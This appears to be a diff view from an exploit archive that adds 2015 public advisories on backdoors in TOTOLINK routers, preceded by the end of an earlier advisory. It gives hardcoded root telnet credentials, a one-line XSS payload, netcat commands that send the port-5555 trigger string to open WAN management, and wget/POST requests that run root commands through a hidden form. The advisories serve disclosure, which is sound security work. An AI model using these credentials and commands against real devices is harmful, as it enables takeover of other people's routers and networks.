<td class=item_td><script>alert("XSS");</script></td>
|
||||
</tr>
|
||||
[...]
|
||||
|
||||
|
||||
- From my research, there are some bits overflapping with others,
|
||||
resulting in showing funny ports
|
||||
and truncating input data. A remote DoS against the upnpd process
|
||||
seems to be easily done.
|
||||
|
||||
Gaining Remote Code Execution by UPNP exploitation is again left as a
|
||||
exercise for the reader.
|
||||
|
||||
|
||||
|
||||
## Vendor Response
|
||||
|
||||
Due to "un-ethical code" found in TOTOLINK products (= backdoors found
|
||||
in new TOTOLINK devices), TOTOLINK was not contacted in regard of this
|
||||
case.
|
||||
|
||||
|
||||
|
||||
## Report Timeline
|
||||
|
||||
* Apr 20, 2015: Vulnerabilities found by Pierre Kim in ipTIME devices.
|
||||
* Jun 20, 2015: Vulnerabilities confirmed with reliable PoCs.
|
||||
* Jun 25, 2015: Vulnerabilities found in TOTOLINK products by looking
|
||||
for similar ipTIME products.
|
||||
* Jul 16, 2015: A public advisory is sent to security mailing lists.
|
||||
|
||||
|
||||
|
||||
## Credit
|
||||
|
||||
These vulnerabilities were found by Pierre Kim (@PierreKimSec).
|
||||
|
||||
|
||||
|
||||
## Greetings
|
||||
|
||||
Big thanks to Alexandre Torres.
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
https://pierrekim.github.io/advisories/2015-totolink-0x01.txt
|
||||
|
||||
|
||||
|
||||
## Disclaimer
|
||||
|
||||
This advisory is licensed under a Creative Commons Attribution Non-Commercial
|
||||
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
|
122
platforms/hardware/webapps/37625.txt
Executable file
122
platforms/hardware/webapps/37625.txt
Executable file
|
@ -0,0 +1,122 @@
|
|||
## Advisory Information
|
||||
|
||||
Title: Backdoor credentials found in 4 TOTOLINK router models
|
||||
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x03.txt
|
||||
Blog URL: https://pierrekim.github.io/blog/2015-07-16-backdoor-credentials-found-in-4-TOTOLINK-products.html
|
||||
Date published: 2015-07-16
|
||||
Vendors contacted: None
|
||||
Release mode: 0days, Released
|
||||
CVE: no current CVE
|
||||
|
||||
|
||||
|
||||
## Product Description
|
||||
|
||||
TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO
|
||||
markets in South Korea.
|
||||
TOTOLINK produces routers routers, wifi access points and network
|
||||
devices. Their products are sold worldwide.
|
||||
|
||||
|
||||
|
||||
## Vulnerabilities Summary
|
||||
|
||||
Backdoor credentials are present in several TOTOLINK products.
|
||||
|
||||
It affects 4 TOTOLINK products (firmwares come from totolink.net and
|
||||
from totolink.cn):
|
||||
|
||||
G150R-V1 : last firmware 1.0.0-B20150330
|
||||
(TOTOLINK-G150R-V1.0.0-B20150330.1734.web)
|
||||
G300R-V1 : last firmware 1.0.0-B20150330
|
||||
(TOTOLINK-G300R-V1.0.0-B20150330.1816.web)
|
||||
N150RH-V1 : last firmware 1.0.0-B20131219
|
||||
(TOTOLINK-N150RH-V1.0.0-B20131219.1014.web)
|
||||
N301RT-V1 : last firmware 1.0.0 (TOTOLINK N301RT_V1.0.0.web)
|
||||
|
||||
It allows an attacker in the LAN to connect to the device using telnet
|
||||
with 2 different accounts: root and 'onlime_r' which gives with root
|
||||
privileges.
|
||||
|
||||
|
||||
|
||||
## Details - G150R-V1 and G300R-V1
|
||||
|
||||
The init.d script executes these commands when the router starts:
|
||||
|
||||
[...]
|
||||
cp /etc/passwd_orig /var/passwd
|
||||
cp /etc/group_orig /var/group
|
||||
telnetd&
|
||||
[...]
|
||||
|
||||
|
||||
The /etc/passwd_orig contains backdoor credentials:
|
||||
|
||||
root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
|
||||
onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
|
||||
nobody:x:0:0:nobody:/:/dev/null
|
||||
|
||||
The corresponding passwords are:
|
||||
|
||||
root:12345
|
||||
onlime_r:12345
|
||||
|
||||
|
||||
## Details - N150RH-V1 and N301RT
|
||||
|
||||
The init.d script executes these commands when the router starts:
|
||||
|
||||
[...]
|
||||
#start telnetd
|
||||
telnetd&
|
||||
[...]
|
||||
|
||||
The binary /bin/sysconf executes these commands when the router starts:
|
||||
|
||||
system("cp /etc/passwd.org /var/passwd 2> /dev/null")
|
||||
|
||||
|
||||
The /etc/passwd.org contains backdoor credentials:
|
||||
|
||||
root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
|
||||
onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
|
||||
nobody:x:0:0:nobody:/:/dev/null
|
||||
|
||||
The corresponding passwords are:
|
||||
|
||||
root:12345
|
||||
onlime_r:12345
|
||||
|
||||
|
||||
|
||||
## Vendor Response
|
||||
|
||||
TOTOLINK was not contacted in regard of this case.
|
||||
|
||||
|
||||
|
||||
## Report Timeline
|
||||
|
||||
* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares.
|
||||
* Jun 26, 2015: working PoCs.
|
||||
* Jul 16, 2015: A public advisory is sent to security mailing lists.
|
||||
|
||||
|
||||
|
||||
## Credit
|
||||
|
||||
These backdoor credentials were found Pierre Kim (@PierreKimSec).
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
https://pierrekim.github.io/advisories/2015-totolink-0x03.txt
|
||||
|
||||
|
||||
|
||||
## Disclaimer
|
||||
|
||||
This advisory is licensed under a Creative Commons Attribution Non-Commercial
|
||||
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
|
199
platforms/hardware/webapps/37626.txt
Executable file
199
platforms/hardware/webapps/37626.txt
Executable file
|
@ -0,0 +1,199 @@
|
|||
## Advisory Information
|
||||
|
||||
Title: Backdoor and RCE found in 8 TOTOLINK router models
|
||||
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
|
||||
Blog URL: https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html
|
||||
Date published: 2015-07-16
|
||||
Vendors contacted: None
|
||||
Release mode: 0days, Released
|
||||
CVE: no current CVE
|
||||
|
||||
|
||||
|
||||
## Product Description
|
||||
|
||||
TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO
|
||||
markets in South Korea.
|
||||
TOTOLINK produces routers routers, wifi access points and network
|
||||
devices. Their products are sold worldwide.
|
||||
|
||||
|
||||
|
||||
## Vulnerabilities Summary
|
||||
|
||||
A backdoor is present in several TOTOLINK products.
|
||||
This was confirmed by analysing the latest firmwares and by testing
|
||||
the backdoor against live routers.
|
||||
|
||||
At least 8 TOTOLINK products are affected (firmwares come from
|
||||
totolink.net and from totolink.cn):
|
||||
|
||||
- A850R-V1 : until last firwmware TOTOLINK-A850R-V1.0.1-B20150707.1612.web
|
||||
- F1-V2 : until last firmware F1-V2.1.1-B20150708.1646.web
|
||||
- F2-V1 : until last firmware F2-V2.1.0-B20150320.1611.web
|
||||
- N150RT-V2 : until last firmware TOTOLINK-N150RT-V2.1.1-B20150708.1548.web
|
||||
- N151RT-V2 : until last firmware TOTOLINK-N151RT-V2.1.1-B20150708.1559.web
|
||||
- N300RH-V2 : until last firmware TOTOLINK-N300RH-V2.0.1-B20150708.1625.web
|
||||
- N300RH-V3 : until last firmware TOTOLINK-N300RH-V3.0.0-B20150331.0858.web
|
||||
- N300RT-V2 : until last firmware TOTOLINK-N300RT-V2.1.1-B20150708.1613.web
|
||||
|
||||
|
||||
By sending a crafted request to the WAN IP, an attacker will open the
|
||||
HTTP remote management interface on the Internet.
|
||||
Then an attacker can use a Remote Code Execution in the HTTP remote
|
||||
management interface by using the hidden /boafrm/formSysCmd form,
|
||||
bypassing the authentication system.
|
||||
|
||||
We estimate there are =~ 50 000 routers affected by this backdoor.
|
||||
|
||||
|
||||
|
||||
## Details - backdoor
|
||||
|
||||
The init.d script executes the /bin/skt binary when the router starts:
|
||||
|
||||
cat etc/init.d/rcS
|
||||
[...]
|
||||
# start web server
|
||||
boa
|
||||
skt&
|
||||
|
||||
|
||||
skt is a small MIPS binary which is a client/server program. The arguments are:
|
||||
|
||||
server: ./skt
|
||||
client: ./skt host cmd
|
||||
|
||||
|
||||
The binary can be used in x86_64 machines using QEMU: sudo chroot .
|
||||
./qemu-mips-static ./bin/skt
|
||||
|
||||
Using skt without argument will launch a TCP daemon on port 5555 in
|
||||
every interface (including WAN), acting as an ECHO server.
|
||||
Using skt with arguments will send a TCP packet containing the command
|
||||
to the specified IP on port 5555.
|
||||
|
||||
The analysis of the binary running on the TOTOLINK devices (for more
|
||||
details, read
|
||||
https://pierrekim.github.io/blog/2015-07-XX-backdoor-in-TOTOLINK-products.html
|
||||
) shows the server mode responds to 3 commands by silently executing
|
||||
system() in the background:
|
||||
|
||||
|
||||
o By sending "hel,xasf" to the device, the device will execute:
|
||||
iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT
|
||||
|
||||
This will open the HTTP remote management interface on port 80 in
|
||||
the eth1 interface which is the WAN interface by default.
|
||||
|
||||
|
||||
o By sending "oki,xasf" to the device, the device will execute:
|
||||
iptables -D INPUT -p tcp --dport 80 -i eth1 -j ACCEPT
|
||||
|
||||
This will close the HTTP remote management interface.
|
||||
|
||||
|
||||
o By sending "bye,xasf" to the device, the device will do nothing
|
||||
|
||||
|
||||
The iptables commands in the backdoor are hardcoded with "eth1".
|
||||
Only devices using DHCP and static IP connections are affected because
|
||||
the WAN IP is attached on the eth1 device.
|
||||
|
||||
It does not affect devices using PPPoE connections, because the WAN IP
|
||||
is attached on the ppp device, as seen below:
|
||||
|
||||
totolink# ifconfig
|
||||
ppp0 Link encap:Point-to-Point Protocol
|
||||
inet addr:X.X.X.X P-t-P:X.X.X.X Mask:255.255.255.255
|
||||
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1438 Metric:1
|
||||
RX packets:17308398 errors:0 dropped:0 overruns:0 frame:0
|
||||
TX packets:2605290 errors:0 dropped:0 overruns:0 carrier:0
|
||||
collisions:0 txqueuelen:64
|
||||
RX bytes:2803138455 (2.6 GiB) TX bytes:277402492 (264.5 MiB)
|
||||
|
||||
|
||||
|
||||
An attacker can use these simple netcat commands to test the backdoor:
|
||||
|
||||
To open the HTTP remote management interface on the Internet:
|
||||
|
||||
echo -ne "hel,xasf" | nc <ip> 5555
|
||||
|
||||
To close the HTTP remote management interface on the Internet:
|
||||
|
||||
echo -ne "oki,xasf" | nc <ip> 5555
|
||||
|
||||
To detect a vulnerable router:
|
||||
|
||||
echo -ne "GET / HTTP/1.1" | nc <ip> 5555
|
||||
|
||||
if you see "GET / HTTP/1.1" in the answer, you likely detected a
|
||||
vulnerable router.
|
||||
|
||||
|
||||
## Details - RCE in the management interface
|
||||
|
||||
A hidden form in the latest firmware allows an attacker to execute
|
||||
commands as root by sending a HTTP request:
|
||||
|
||||
|
||||
POST /boafrm/formSysCmd HTTP/1.1
|
||||
|
||||
sysCmd=<cmd>&apply=Apply&msg=
|
||||
|
||||
|
||||
An attacker can use wget to execute commands in the remote device:
|
||||
|
||||
wget --post-data='sysCmd=<cmd>&apply=Apply&msg='
|
||||
http://ip//boafrm/formSysCmd
|
||||
|
||||
|
||||
For instance, sending this HTTP request to the management interface
|
||||
will reboot the device:
|
||||
|
||||
|
||||
POST /boafrm/formSysCmd HTTP/1.1
|
||||
|
||||
sysCmd=reboot&apply=Apply&msg=
|
||||
|
||||
This wget command will do the same job:
|
||||
|
||||
wget --post-data='sysCmd=reboot&apply=Apply&msg='
|
||||
http://ip//boafrm/formSysCmd
|
||||
|
||||
|
||||
|
||||
## Vendor Response
|
||||
|
||||
TOTOLINK was not contacted in regard of this case.
|
||||
|
||||
|
||||
|
||||
## Report Timeline
|
||||
|
||||
* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares.
|
||||
* Jun 26, 2015: Working PoCs with RCE.
|
||||
* Jul 13, 2015: Updated firmwares confirmed vulnerable.
|
||||
* Jul 16, 2015: A public advisory is sent to security mailing lists.
|
||||
|
||||
|
||||
|
||||
## Credit
|
||||
|
||||
These vulnerabilities were found by Alexandre Torres and Pierre Kim
|
||||
(@PierreKimSec).
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
|
||||
https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html
|
||||
|
||||
|
||||
|
||||
## Disclaimer
|
||||
|
||||
This advisory is licensed under a Creative Commons Attribution Non-Commercial
|
||||
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
|
Loading…
Add table
Reference in a new issue